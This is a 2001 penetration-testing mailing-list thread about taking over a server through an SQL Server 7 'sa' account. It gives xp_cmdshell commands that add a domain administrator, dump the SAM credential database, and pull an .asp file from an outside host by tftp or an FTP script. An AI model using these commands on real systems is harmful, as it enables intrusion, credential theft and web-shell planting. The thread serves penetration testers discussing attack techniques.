Re: [PEN-TEST] Hacking a server through SQL SERVER 7

[MadHat <madhat () UNSPECIFIC COM>]

At 01:40 PM 1/25/2001 -0500, you wrote:
> If I understand your question, try:
>
> xp_cmdshell 'echo filecontent > c:\file.asp'
>
> This will create a file named 'file.asp', with the text 'filecontent' in it.

If UDP port 69 is open, you can use tftp easily

xp_cmdshell 'tftp remotehost get file.asp c:\destination_file.asp'

Or if you can FTP from inside, you can use FTP to grab files off of other
servers from the SQL server with an ftp script.
It has been a while since I played with this, so the syntax may be a little
off, but basically

xp_cmdshell 'echo user > script.file; echo pass >> script.file; echo bin >>
script.file; echo get file.asp >> script.file; echo quit>>script.file; ftp
-s:script.file remotehost'

The script file is line by line what will be sent to the ftp once the
connection is made, if I am not mistaken, so you need the user, the pass
and whatever commands you would use... like

anonymous
user () here com
ascii
get file.asp c:\des_file.asp
quit

so though you can't FTP in, you might be able to FTP out.


> Aaron C. Newman
>
> > -----Original Message-----
> > From: Penetration Testers [mailto:PEN-TEST () SECURITYFOCUS COM]On Behalf
> > Of FiC
> > Sent: Thursday, January 25, 2001 4:33 AM
> > To: PEN-TEST () SECURITYFOCUS COM
> > Subject: Re: [PEN-TEST] Hacking a server through SQL SERVER 7
> >
> >
> > Thank you all for your valuable information.
> >
> > Is there anyway to upload/create a file in the hacked SQL SERVER
> > through the
> > system commands? I think that the machine is behind a Firewall
> > and even if I
> > start the FTP service I can't connect via ftp, and the port 139
> > is not open
> > or its filtered. I've tried to create an .asp file with the "copy con"
> > command, but I can't do it through the SQL console. How can I
> > upload/create
> > an .asp file to this server?
> >
> > Thanx.
> >
> >
> > > Once you have access to a MSSQL 7 server via the "sa" account,
> > you can do
> > > all sorts of fun things:
> > >
> > > Run system commands:
> > >
> > > EXEC [master].[dbo].[xp_cmdshell] "net user newuser newpass
> > /ADD /DOMAIN"
> > > EXEC [master].[dbo].[xp_cmdshell] "net group 'Domain Admins'
> > newuser /ADD
> > > /DOMAIN"
> > >
> > > You can also access the registry, send email, dump system information...
> > > Take a look at some of the Extended Stored Procedures in the [master]
> > > database with SQL Query Analyzer.  Depending on the user the
> > server runs at
> > > (normally SYSTEM or Administrator), you can usually use xp_cmdshell to
> > > rebuild the repair disk data with rdisk /s and snag the SAM database.
> > >
> > > I will be giving a presentation at the upcoming CanSecWest conference
> > > covering a variety of SQL server attacks, everything from
> > general procedure
> > > exploitation to insertion techniques.  At the conference, I will be
> > > releasing a handful of new tools, one of which exploits the RDS
> > component
> > > in new ways, allowing access to SQL servers as well as proxying
> > requests to
> > > internal systems through it.  For more information on the conference,
> > > please see http://www.cansecwest.com, online registration should be
> > > available within a few weeks.
> >
> > --
> > ~/ FiC /~
> >

--
MadHat at unspecific.com